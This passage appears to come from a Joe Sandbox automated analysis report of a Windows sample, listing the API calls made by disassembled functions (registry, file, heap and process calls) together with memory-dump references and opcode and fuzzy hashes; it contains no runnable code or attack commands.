                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat$FileModuleNameOpen
                                    • String ID: \$\Include\
                                    • API String ID: 3592542968-2640467822
                                    • Opcode ID: 1857b13d34bed3f1b0ae19bdad427471213e492365d2b65299f28ecbf530e1db
                                    • Instruction ID: 5b0c2aa9581d2169c4301fc1347b9557dde7f72002e00ef5417b4371d982845a
                                    • Opcode Fuzzy Hash: 1857b13d34bed3f1b0ae19bdad427471213e492365d2b65299f28ecbf530e1db
                                    • Instruction Fuzzy Hash: 335187754083409FC714EF59E9818BEB7F8FFAA300F40452EF64993661EB749988CB5A
                                    APIs
                                    • __getstream.LIBCMT ref: 001534FE
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00153539
                                    • __wopenfile.LIBCMT ref: 00153549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                    • String ID: <G
                                    • API String ID: 1820251861-2138716496
                                    • Opcode ID: bfca694943dbfdbcdac4f1e0f2fdde655c6de6270c7501f6f309e88b586175e1
                                    • Instruction ID: e6a423bea8fdd60cac7ef081400c1a327d5572af42da0572104481702a99f30e
                                    • Opcode Fuzzy Hash: bfca694943dbfdbcdac4f1e0f2fdde655c6de6270c7501f6f309e88b586175e1
                                    • Instruction Fuzzy Hash: 8811E770A00206DFDB26BF709C4266E36E4AF15392B158825EC35CF181FB30CB1997A1
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0014D28B,SwapMouseButtons,00000004,?), ref: 0014D2BC
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0014D28B,SwapMouseButtons,00000004,?,?,?,?,0014C865), ref: 0014D2DD
                                    • RegCloseKey.KERNELBASE(00000000,?,?,0014D28B,SwapMouseButtons,00000004,?,?,?,?,0014C865), ref: 0014D2FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: cce2b75daf3434a1ca514e29788ec109976eccba469543f70f3ba4ecb62007ec
                                    • Instruction ID: 27085cb9fb15cedc2e529bf3fde177eb10c078bcbb1cbb8977d8f69a84f8cd1c
                                    • Opcode Fuzzy Hash: cce2b75daf3434a1ca514e29788ec109976eccba469543f70f3ba4ecb62007ec
                                    • Instruction Fuzzy Hash: D01157B5611208BFDF258FA4EC84EAE7BB8EF04740B004569F801D7120E771AE40AB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                    • String ID:
                                    • API String ID: 3877424927-0
                                    • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction ID: a2fc3e51de0abbb498f0b4a49b575fef1b5d1bc7532c7fee7f9c1f10bcd51cae
                                    • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction Fuzzy Hash: 6351C9B1E00205EBCB288FA9888556E77A1AF543A2F24872DFC359F2D0D7709F589B50
                                    APIs
                                      • Part of subcall function 00134517: _fseek.LIBCMT ref: 0013452F
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C65D
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C670
                                    • _free.LIBCMT ref: 0017C4DD
                                    • _free.LIBCMT ref: 0017C4E4
                                    • _free.LIBCMT ref: 0017C54F
                                      • Part of subcall function 00151C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00157A85), ref: 00151CB1
                                      • Part of subcall function 00151C9D: GetLastError.KERNEL32(00000000,?,00157A85), ref: 00151CC3
                                    • _free.LIBCMT ref: 0017C557
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 4d0011766ac7825e8f5428eacbaa439ae8e3e2767bcc598b916f2a43082ec030
                                    • Instruction ID: aebe2be37f230b460545b74929be94aac753709bbca52715360bd3f4d951716c
                                    • Opcode Fuzzy Hash: 4d0011766ac7825e8f5428eacbaa439ae8e3e2767bcc598b916f2a43082ec030
                                    • Instruction Fuzzy Hash: 0B5162B1904218AFDF249F64DC81BADBBB9EF58304F1040AEF61DA7241DB716A80CF58
                                    APIs
                                      • Part of subcall function 0015395C: __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 0015395C: __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015395C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    • std::exception::exception.LIBCMT ref: 0014F51E
                                    • __CxxThrowException@8.LIBCMT ref: 0014F533
                                      • Part of subcall function 00156805: RaiseException.KERNEL32(?,?,0000000E,001E6A30,?,?,?,0014F538,0000000E,001E6A30,?,00000001), ref: 00156856
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    • Opcode ID: 95170121567cb2228c02ec3114ba13d00f2575de04498d4a297f05c4faaf84dd
                                    • Instruction ID: 235682dfdf210019271c676c5473fc4a8c6d21b79af11aff41ae61eb8cb6f9c6
                                    • Opcode Fuzzy Hash: 95170121567cb2228c02ec3114ba13d00f2575de04498d4a297f05c4faaf84dd
                                    • Instruction Fuzzy Hash: ADF0A47110421DA7D708BFA8E9159DE77A89F10354FA04039FD14EB291DFB0964586E5
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0177BF55
                                    • ExitProcess.KERNEL32(00000000), ref: 0177BF74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction ID: 61830d5fb91255f9c463bd159fae9c2bb240710740e3784707cc11051a6aff69
                                    • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction Fuzzy Hash: 56F0ECB154024CABDF60DFE4CC49FEEB77CBF04705F508508BA0ADA184EA7596088B61
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0017C72F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0017C746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: a64b4a47cff93cc6477ab3938966b006c7439a89292c5a443465c7b35c7199af
                                    • Instruction ID: 4b8528969033f07c0132599b563c487ce025d03da0080427d7a97f1c151c10e7
                                    • Opcode Fuzzy Hash: a64b4a47cff93cc6477ab3938966b006c7439a89292c5a443465c7b35c7199af
                                    • Instruction Fuzzy Hash: 76D05E7150030EAFDB10AB90EC4EF8A776C9700708F0002E07650A50B2EBB0E6D98B54
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c342c9b89239015b36fa9f69e26f114da21038ac59838e0bcfe13c195cd7bf9
                                    • Instruction ID: 8b4891250f5da76c7b2eb4162a2a609d2f324659f58b811cb500405ddae01026
                                    • Opcode Fuzzy Hash: 4c342c9b89239015b36fa9f69e26f114da21038ac59838e0bcfe13c195cd7bf9
                                    • Instruction Fuzzy Hash: ABF15A716083019FCB14EF24C885B5AB7E5FF98314F14892DF9999B292D770EA46CF82
                                    APIs
                                    • _memset.LIBCMT ref: 00135022
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001350CB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell__memset
                                    • String ID:
                                    • API String ID: 928536360-0
                                    • Opcode ID: 12bea02779123c6ba91f52ac69b79462b40fb942d717488da4810b7bcbea5b45
                                    • Instruction ID: 1e8464cc86dd447d51d4d94bd8f3e2751886c4cb954a886583af50a274035060
                                    • Opcode Fuzzy Hash: 12bea02779123c6ba91f52ac69b79462b40fb942d717488da4810b7bcbea5b45
                                    • Instruction Fuzzy Hash: 9D31C1B0504701DFD325DF74D8406ABBBE8FF48708F00092EF59A83641E772A984CB92
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 001581C2: __NMSG_WRITE.LIBCMT ref: 001581E9
                                      • Part of subcall function 001581C2: __NMSG_WRITE.LIBCMT ref: 001581F3
                                    • __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015821F: GetModuleFileNameW.KERNEL32(00000000,001F0312,00000104,00000000,00000001,00000000), ref: 001582B1
                                      • Part of subcall function 0015821F: ___crtMessageBoxW.LIBCMT ref: 0015835F
                                      • Part of subcall function 00151145: ___crtCorExitProcess.LIBCMT ref: 0015114B
                                      • Part of subcall function 00151145: ExitProcess.KERNEL32 ref: 00151154
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: 36ef9cb3048bdc0d33e215a0fc96d151c54f4f4e4939e045a68695f56ff83bf9
                                    • Instruction ID: 35dabc3099921d3d9ab1474e96d4c15a96cadd57317328e94716f1c63982c137
                                    • Opcode Fuzzy Hash: 36ef9cb3048bdc0d33e215a0fc96d151c54f4f4e4939e045a68695f56ff83bf9
                                    • Instruction Fuzzy Hash: 0701D676245602EAE6173B24EC46B2E23489B927AAF210025FD35DF182DBF09D4886A0
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0017C385,?,?,?,?,?,00000004), ref: 0017C6F2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0017C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0017C708
                                    • CloseHandle.KERNEL32(00000000,?,0017C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0017C70F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: e777aa5d39bb61e915bb385b1e499aebd2a88b21932187638ea94a3a4de41d86
                                    • Instruction ID: c1a49d754b8a2eb84210bbbeddefbcc4c51b4c2ae91c5e46db0678cbc54feb19
                                    • Opcode Fuzzy Hash: e777aa5d39bb61e915bb385b1e499aebd2a88b21932187638ea94a3a4de41d86
                                    • Instruction Fuzzy Hash: C0E08632140214B7D7251B58BC09FCA7B69AB45760F144210FB14790E1A7B125518798
                                    APIs
                                    • _free.LIBCMT ref: 0017BB72
                                      • Part of subcall function 00151C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00157A85), ref: 00151CB1
                                      • Part of subcall function 00151C9D: GetLastError.KERNEL32(00000000,?,00157A85), ref: 00151CC3
                                    • _free.LIBCMT ref: 0017BB83
                                    • _free.LIBCMT ref: 0017BB95
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                    • Instruction ID: 292cb4fb027bb78f1289b543f3abfe83a6e8d3a328ac8bc03ad2239861cd913b
                                    • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                    • Instruction Fuzzy Hash: 30E05BA5745741D7DA3465796E88FB313DC4F14352714081EBC7DEB146CF24F84485B4
                                    APIs
                                      • Part of subcall function 001322A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00132303
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001325A1
                                    • CoInitialize.OLE32(00000000), ref: 00132618
                                    • CloseHandle.KERNEL32(00000000), ref: 001A503A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 458326420-0
                                    • Opcode ID: 84d2a1b25314a23cc6b5a5c71aa5bc19540977a370705daf50f7c9e226d08bc0
                                    • Instruction ID: a718499c98fb2278e6ec3e62a7f491a46ad78dc055e7a7904f870978cb73cf23
                                    • Opcode Fuzzy Hash: 84d2a1b25314a23cc6b5a5c71aa5bc19540977a370705daf50f7c9e226d08bc0
                                    • Instruction Fuzzy Hash: 6C719EB4901385EBC304EFABBD914B9BBA4BBA93547A0466ED10AD7F71CB314485CF14
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    • Opcode ID: 5efaa657e4fd48a8d123cd5b2883269bd4b9e1599d9ac0920cc104b231d7e1d9
                                    • Instruction ID: 70480c51665affd90888d7df2d41de9f9a7eef1845e4c31078208fa367d28e32
                                    • Opcode Fuzzy Hash: 5efaa657e4fd48a8d123cd5b2883269bd4b9e1599d9ac0920cc104b231d7e1d9
                                    • Instruction Fuzzy Hash: E3012D719042187EDB18C798CC56FFDBBF89B15301F00855AF567D7181D6B4E7088B60
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0017FEDD
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0017FF96
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast__wsplitpath
                                    • String ID:
                                    • API String ID: 2679896820-0
                                    • Opcode ID: 31f211ce0adb1228a5e1ff697054d978f4a49184e403ee28d5849ab372f88032
                                    • Instruction ID: c232e1bdadc60cb6d947483462e01ecf228fdd2cdaa2087ae79b14b5a74c18a8
                                    • Opcode Fuzzy Hash: 31f211ce0adb1228a5e1ff697054d978f4a49184e403ee28d5849ab372f88032
                                    • Instruction Fuzzy Hash: 845191322043019FCB14EF64D491BAAB3E5BF59310F04856DF95A8B2E2CF30A946CB52
                                    APIs
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __getbuf.LIBCMT ref: 00158EFA
                                    • __lseeki64.LIBCMT ref: 00158F6A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                    • String ID:
                                    • API String ID: 3311320906-0
                                    • Opcode ID: 7e6d57b1535bae0ee250f5b59436942e7cc9da9264dde508fca493bd65224040
